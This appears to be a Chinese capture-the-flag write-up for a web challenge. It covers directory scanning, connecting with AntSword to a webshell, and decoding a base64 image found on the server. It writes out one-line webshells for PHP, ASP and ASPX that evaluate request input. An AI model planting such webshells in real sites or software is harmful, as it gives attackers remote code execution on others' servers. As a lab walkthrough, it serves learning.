<>进入题目环境

<>用dirsearch扫一下

<>访问 /index.php

由弹窗内容可以联想到一句话木马<?php @eval($_POST['cmd']);?>

<>常见一句话木马
php的一句话木马: <?php @eval($_POST['shell']);?> asp的一句话是: <%eval request ("shell")%>
aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["shell"],"unsafe");
%>
<>蚁剑连接

<>目录下发现一个.txt 文件

<>下载该文件

得到很长的一段结尾是等号的字符串,我开始还用base64解码解不出来,真的是蠢,flag哪有那么长,这肯定是一张图片的base64编码呀,写个img标签就能解决(学会新技能了0.0)
<img src="data:image/jpeg;base64, 这里是图片的base64编码">

吐槽一下,每一次做的题里面,都有上面这样的图片,难道是因为CTF界盛产二次元?(不过,,,真的好看0.0)

<>img标签的其他格式
<img src="data: 各种格式 "> data:,文本数据 data:text/plain,文本数据 data:text/html,HTML代码
data:text/html;base64,base64编码的HTML代码 data:text/css,CSS代码 data:text/css;base64,
base64编码的CSS代码 data:text/javascript,Javascript代码 data:text/javascript;base64,
base64编码的Javascript代码 data:image/gif;base64,base64编码的gif图片数据 data:image/png;
base64,base64编码的png图片数据 data:image/jpeg;base64,base64编码的jpeg图片数据 data:image/x-
icon;base64,base64编码的icon图片数据

技术
©2019-2020 Toolsou All rights reserved,
css中上下左右居中的几种实现方法[CISCN 2019 初赛]Love Mathc/c++语言实现登陆界面Unity3D 人称设置(第一人称视角、第三人称视角)Fastadmin框架自定义搜索操作流程2021最新Python自动化软件测试笔试题(含答案)黑客帝国装逼的代码雨mysql数据库设置字符集配置修改my.ini文件(windows)python之panda模块1Python学习笔记:基础+进阶10道练习题